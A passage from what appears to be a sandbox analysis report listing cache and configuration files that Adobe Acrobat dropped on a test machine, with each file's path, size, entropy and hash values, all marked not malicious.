SHA1: | 6B2643A17D06607A23ABC7EE16CF18C994AF0A18 |
SHA-256: | CB1AE5D432A184EA4EEB53D680568F3DFBF46459F88834C80F4FABB220CC1C02 |
SHA-512: | C36498A447B549DBA57D1C51068AB901E7F9E2FBD6E0B1F284582B5025C9829B53D27F65F4D3D4AD4A082B013D7AC5A81361924C3AEB2B5F83546D656933FAAC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.129317816120386 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlJvl+q2PCHhJ2nKuAl9OmbnIFUtSqVlJvfAWZmwsqVlJvf3VkwOCHhJ2nKZ:7nfl+vBHAahFUtZQW/LnV56HAaSJ |
MD5: | F47A2855A789DDE08896DF83BBD29CDD |
SHA1: | DDB5D7E0F849900F851F92E3B3184BD6CF640110 |
SHA-256: | AF54B69489277D27F7A56D2BFDE873B670744AD87A0CD5155E98D97A578CD1AE |
SHA-512: | EECD1236213D8EE52EBEE5B1E6756EEFBFFB131F23F96C68A78306F61E4092CC0F37C988F9FD1D300992297E2DF388E018F064AD956275EDD6FF90AC8958040F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.129317816120386 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlJvl+q2PCHhJ2nKuAl9OmbnIFUtSqVlJvfAWZmwsqVlJvf3VkwOCHhJ2nKZ:7nfl+vBHAahFUtZQW/LnV56HAaSJ |
MD5: | F47A2855A789DDE08896DF83BBD29CDD |
SHA1: | DDB5D7E0F849900F851F92E3B3184BD6CF640110 |
SHA-256: | AF54B69489277D27F7A56D2BFDE873B670744AD87A0CD5155E98D97A578CD1AE |
SHA-512: | EECD1236213D8EE52EBEE5B1E6756EEFBFFB131F23F96C68A78306F61E4092CC0F37C988F9FD1D300992297E2DF388E018F064AD956275EDD6FF90AC8958040F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 338 |
Entropy (8bit): | 5.173644862510903 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlRi+q2PCHhJ2nKuAl9Ombzo2jMGIFUtSqVlLtZZmwsqVlWtVkwOCHhJ2nK3:7nzvBHAa8uFUtZp//Lg56HAa8RJ |
MD5: | 73069F6043106934049A672EC75F7E1C |
SHA1: | E6A8BEE67BDC1E975867BBE0EBCD332967333BEB |
SHA-256: | 8140B3CC4EF239C39EF5884320FF238802C1CB31B949F650CA3390313AF23861 |
SHA-512: | 1382C46A6B4391DE768FB9F5297414BB7E14A3780A4C1073F29E8155BAC241D4C04E454903C765D4A03F1301C85F978CD7B042396DC9050A4C553DF222DC998A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 338 |
Entropy (8bit): | 5.173644862510903 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlRi+q2PCHhJ2nKuAl9Ombzo2jMGIFUtSqVlLtZZmwsqVlWtVkwOCHhJ2nK3:7nzvBHAa8uFUtZp//Lg56HAa8RJ |
MD5: | 73069F6043106934049A672EC75F7E1C |
SHA1: | E6A8BEE67BDC1E975867BBE0EBCD332967333BEB |
SHA-256: | 8140B3CC4EF239C39EF5884320FF238802C1CB31B949F650CA3390313AF23861 |
SHA-512: | 1382C46A6B4391DE768FB9F5297414BB7E14A3780A4C1073F29E8155BAC241D4C04E454903C765D4A03F1301C85F978CD7B042396DC9050A4C553DF222DC998A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\358331c0-dbe8-420f-b26f-b5dfe20bac86.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.966630653803457 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqpgxsBdOg2HWgcaq3QYiub6P7E4T3y:Y2sRds8gidMHWL3QYhbS7nby |
MD5: | D74651D5BDA967D501BD56E0AE624DB4 |
SHA1: | 5943559B336AB26A26FF58E1606C9F8EA6F7011B |
SHA-256: | 0341125E831484A4C603F0914E312E64A7B2FEBD379667C1E9C113FB8AE09027 |
SHA-512: | 7FEE01CF76FDB88F502AE6EE4AB5D491DEF8C14E396111CAD441811FA31B0F73239DB248D7ED0913AB4B95D8848287725494771D3FDD2B00026D4EDECAE6E6B4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.966630653803457 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqpgxsBdOg2HWgcaq3QYiub6P7E4T3y:Y2sRds8gidMHWL3QYhbS7nby |
MD5: | D74651D5BDA967D501BD56E0AE624DB4 |
SHA1: | 5943559B336AB26A26FF58E1606C9F8EA6F7011B |
SHA-256: | 0341125E831484A4C603F0914E312E64A7B2FEBD379667C1E9C113FB8AE09027 |
SHA-512: | 7FEE01CF76FDB88F502AE6EE4AB5D491DEF8C14E396111CAD441811FA31B0F73239DB248D7ED0913AB4B95D8848287725494771D3FDD2B00026D4EDECAE6E6B4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.234625682369113 |
Encrypted: | false |
SSDEEP: | 96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bbTNb4wx:S43C4mS7fFi0KFYDjr3LWO3V3aw+bbZF |
MD5: | 72ACB663F3D2C4BC5470041A754066CC |
SHA1: | CE9014A7EB5D61DF7B18400887EC736D09BEEFB6 |
SHA-256: | 19C1ED7F7C1C4E2028BEC9FA1D1C51DDA06F035E424E0823F6671221161B3449 |
SHA-512: | 4597CD9066FF547629293EDF22755E3BC2C27DAF12BF585319AD6E6F2F8D233D452A8718933363093D9119E64E05A367A09C50379DC601FCD277EB55FC91DCDE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 5.174953741901667 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlPPN+q2PCHhJ2nKuAl9OmbzNMxIFUtSqVlPAfXZmwsqVlPJNVkwOCHhJ2nv:7nRgvBHAa8jFUtZRAfX/LRJ56HAa84J |
MD5: | 31ED23CDAD6D9974590896E6B313496F |
SHA1: | B0B481F15593E02BB265BC3D0D191EB722FF8373 |
SHA-256: | F4D8DFA73A8054C9F3256304FC877DF27C36E40BE618BF8782D5DE1CF1170E73 |
SHA-512: | AED9CA40D3E5BA5FCCBD2915A480317C564FE393714A5628C96562BEE35EC9B8CCC065ED7C3282427D1BF46AFF3201A8FF6FC59FB10ABFE722A48C76FA82B510 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 5.174953741901667 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlPPN+q2PCHhJ2nKuAl9OmbzNMxIFUtSqVlPAfXZmwsqVlPJNVkwOCHhJ2nv:7nRgvBHAa8jFUtZRAfX/LRJ56HAa84J |
MD5: | 31ED23CDAD6D9974590896E6B313496F |
SHA1: | B0B481F15593E02BB265BC3D0D191EB722FF8373 |
SHA-256: | F4D8DFA73A8054C9F3256304FC877DF27C36E40BE618BF8782D5DE1CF1170E73 |
SHA-512: | AED9CA40D3E5BA5FCCBD2915A480317C564FE393714A5628C96562BEE35EC9B8CCC065ED7C3282427D1BF46AFF3201A8FF6FC59FB10ABFE722A48C76FA82B510 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 57344 |
Entropy (8bit): | 3.2934105337428026 |
Encrypted: | false |
SSDEEP: | 192:PedRB8Vui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:Peuci5H5FY+EUUUTTcHqFzqFP |
MD5: | 90034ABB3BF90630D7647F098E32C296 |
SHA1: | D88663CB6FC2299D51C4E9F70207D2C20C6D7195 |
SHA-256: | 83AB15186F1634CAF44ADF35780BEEF1B2EE3E66E12C9C6C634BD959D845CE6E |
SHA-512: | D7CF5AC2F196DE13F91D0F6A6D6B3102D9B5AB267C6A43E82ECEEDEFE234E2564949A916F6CBBA67A97A22C3A12F0A6624C47AEC4777B69B084B244FEFC0AFFA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.210437276124038 |
Encrypted: | false |
SSDEEP: | 24:7+tfEwK9qLKzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9MzmX:7M09qOmFTIF3XmHjBoGGR+jMz+LhV |
MD5: | 0B6304829D550CCB734EDDA59EAA027E |
SHA1: | F3834638E1F21EBAA08250870CC4F49248C6904D |
SHA-256: | 6B4B767E9FB38360792B9595C2C84702C80EEB3C9F25C8A698887FCC52938900 |
SHA-512: | 33E756B4D2212E6782CBEB7E0CA08737406926B3DFF44C701F59BD7A0C70385CB1EFF687413E2C70EFB26731BEB75DD9CCD128838905C0ED96424E69BEDC44B4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7425532007658724 |
Encrypted: | false |
SSDEEP: | 3:kkFklAODEllltfllXlE/HT8k8ExtNNX8RolJuRdxLlGB9lQRYwpDdt:kKZgseT8OpNMa8RdWBwRd |
MD5: | 9215DA168E52DDC16A6FD36035339A35 |
SHA1: | 75537EA1C48A97E3C5362D4E2F9305E6CDB9E4E8 |
SHA-256: | 42A0719B87F8A4DEE2C1AC472A3CD2054C60F32F2C45A9E08500C2530F722755 |
SHA-512: | 1058F272A0E1FC7DA5277323913118A8F3EB99F3A19D399FD42F6D5AF76EADE7CD91B8FC62D8B704F5578B9CAB2D6FD7F4140D04645CC3AE2136064C0FF9AA41 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.1330815974444413 |
Encrypted: | false |
SSDEEP: | 6:kKVvL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:ViDnLNkPlE99SNxAhUe/3 |
MD5: | 60389CDCB504DE2A09EE03B25B39893D |
SHA1: | 6F21C7A1D56658896D35AC3764DF250693E00FF2 |
SHA-256: | 36EB86DA8C43C75FC0447B1E9DAEB2C350CB2824F346F1416A3BF061575E13F9 |
SHA-512: | 386A75C65E16DA9BFCE806316FD487DA413C6E7CF06A892E6E9254BD85D15D646C9F4B5F74B96F5263AA58D66D78F07D8CE87571AFA39416C4052D0CE413AB35 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.352086139213588 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJM3g98kUwPeUkwRe9:YvXKXec2vR/ZwHAFZGMbLUkee9 |
MD5: | FFDC76659AE4BA2CA7DEC4307E1D48FE |
SHA1: | 07795FB025CD8B9C6BB84AE3654F0D307E2BE502 |
SHA-256: | 29426E16A076F60C88CD12ADB6E424697C6B46E8477B60090C1D6A63F366A1E7 |
SHA-512: | 7F806D07E755A7149931913A6081D6800B7075E442B25DC9B9B164670E7C4436C461BE163960CC41A3884DCD1ED787DB156EC82D31C6C6FE168FCA2C422EC0C8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.289448897119001 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJfBoTfXpnrPeUkwRe9:YvXKXec2vR/ZwHAFZGWTfXcUkee9 |
MD5: | DDBD7576461BA41D8B97358EBB241319 |
SHA1: | DF3154D50F5A6DDCDC1A3D2C7BBACF73273E108E |
SHA-256: | 581141A20553E37A6D5B67023399A0200FE1479F1771D0B07C67239CDDC1027D |
SHA-512: | 95C5A812D7EB828A680D323D85B31D64FB9BF1AC0F88632D06AB34501BCAA0F6AD04353086B8D22C7A4FEFB4F81D6A5360031070D43C88199E88B2B4245E9394 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.266992095337622 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJfBD2G6UpnrPeUkwRe9:YvXKXec2vR/ZwHAFZGR22cUkee9 |
MD5: | CC08A9B195F6C08685C6E8BCCF0A194B |
SHA1: | 037C9A118B10CA3DCC352073707B25CAE6061431 |
SHA-256: | 84CEF6D5E7A5B861822B96784BA8240995C1E056366CAA39443C07A9D0D1F4ED |
SHA-512: | 0AF9CF9CD796C7DEF71458B9DEA43C5E66E53304E2BFA16013D1379D7B6EB3DFB5213693BF3750EDC25FFD8AFFC59454761A91F19F3D7F1BFF91ACB004483662 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.328638992878057 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJfPmwrPeUkwRe9:YvXKXec2vR/ZwHAFZGH56Ukee9 |
MD5: | D47A0E6985E380C57C0DD71AE0776DC9 |
SHA1: | 793AA2C9FDAA509F12AAEDB4D4FC45C5B18C1734 |
SHA-256: | F855A2CB9A09E3E4E0A8CC989E74BDBDE386599A70A68A0F856A3C6405B80E94 |
SHA-512: | 03B9E638F5DD522E9F9E15597FDF12C8779F86CDEECF1A10BA914BCFE3D3F1A2C327395B2044DE38FA358559A566ED7CA43ABCD52AB38C45DDC2B3A506F95190 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.685052937917418 |
Encrypted: | false |
SSDEEP: | 24:Yv6XT2JhkpLgE9cQx8LennAvzBvkn0RCmK8czOCCS8:YvTJhkhgy6SAFv5Ah8cv/8 |
MD5: | B4EE4F8CE71F0C2D72FDCC62DF3D630A |
SHA1: | ABE0AEFF77539F872EF6E9D7C29FACFE8D3133D3 |
SHA-256: | 71576EF2D286173815B450A396BA99DBF01483D7EDABD694DF05998A8FB83ECA |
SHA-512: | 9AC0A664B784D77BB6C9ECEE21F14BDAD1F9A46E436A7A6118EA80E745643B3964A59F9621EA1697E0B38B97DFACE9A24E3E821B518E86B64108CF0166B23F2A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.274025993242097 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJf8dPeUkwRe9:YvXKXec2vR/ZwHAFZGU8Ukee9 |
MD5: | 2EA01F97CF56BE1AE76E37978FFDC83E |
SHA1: | 417C3C216D947785FDBEC2E993228D221A3C29D3 |
SHA-256: | 81B234F8B42B2683916AD1E3436452E66D39B3B30E3676A51FF6C3ABDCDC81DB |
SHA-512: | 1632DF4A6E0590A57AB204945CEE2893245E5F60D6198EB8DE88B748079451BD4FDBE2C70D2A248881AD6205E1EB80E226FFC97A4676AF774922CF08E55874FE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.273846240622875 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJfQ1rPeUkwRe9:YvXKXec2vR/ZwHAFZGY16Ukee9 |
MD5: | 9FE51CDF09F46F8ED1DE57B577AE8342 |
SHA1: | 1CCCFE319F3ABDF68DC692E15E8B0490E393ADB7 |
SHA-256: | 82CDCC259B964BCDFDCF54204960D2A69475B4710EFD272E8565C35A09B6C0EF |
SHA-512: | E203750727AB33C435B6187E205B63DC2694391DB04E639ABDBA9133C8906EB06016B1F49F9568AC2746B4EB342D94D1F41102F8650422A3008DD2E069D246C0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.286770887500765 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJfFldPeUkwRe9:YvXKXec2vR/ZwHAFZGz8Ukee9 |
MD5: | 86D30759136FBA4EEDD54EE3CEB5EA28 |
SHA1: | 6FF174AB36E8346BC697D53DE544971A4678789D |
SHA-256: | BF95DDCEF0FFFB1E6AF573C2AAEA7EB520A58887D6CEA99EA55D5E11EDACF61D |
SHA-512: | 8DFF45E9E66FE0C141755CAFBC3734E3EE38642F3F6752159999B95B544EDE8B016AB32C6E207B8F2518119CA06B469562289B6D2EC30C28A18E33D0CD16E53A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.303083485605903 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJfzdPeUkwRe9:YvXKXec2vR/ZwHAFZGb8Ukee9 |
MD5: | DA181ED6F71620741138080085F71694 |
SHA1: | E47D026304B497908E73CA19B920C31E0152CDF9 |
SHA-256: | 3EE7B11A4620A35CFAB42B94D35BDE9EDF280D83CCD2CE14B1825FB95F477B5D |
SHA-512: | B5C2A91848733B4CFBC7398455251328875D2F16B26AB3ABFBC04CE88B383B6931D08E3B91F5974ED0E928D4D0A78CD7094B60A645B28CBFF897AFACEEB92B01 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.283929569575912 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJfYdPeUkwRe9:YvXKXec2vR/ZwHAFZGg8Ukee9 |
MD5: | E9F3CE5EF3601C10C21502BB1C59DA7D |
SHA1: | 92A5FEFB6451F16788140BF4FFDA9C0C3A4B4E26 |
SHA-256: | 2EB4BA0F6A82A3B5C829DE44CFAB911232B98F17266EEC7DF7ECBDD1CC1F3F23 |
SHA-512: | 6F4C509764B8B49DB0135FAA6EEB1B1F1EAA7A9EF9DF5C093A6B3C0323504FD84AE1577B69A06B853832B3ADC881B41433FDC3781B6639157D422FD6E088CCD6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.269379310752646 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXedwJDn2vB3/dVlPIHAR0Y/JqoAvJf+dPeUkwRe9:YvXKXec2vR/ZwHAFZG28Ukee9 |
MD5: | E7D3CCC5032A180A4139421317A31427 |
SHA1: | 60A363560D22681DEB08F637B1133359F805038A |
SHA-256: | 6EC78113A2A79D56CC95E02499F4A23FB4EB66F2E1D88EE9D5E6BAAAE56364B0 |
SHA-512: | 814D10F50F3CECD1DAEB8573F9A3D584A95274F597F024CABA70940FCACBDF3A5831214A72AF7A606D8C76679CF44D4729BABD71715321BEF1F61105DE58E8F3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
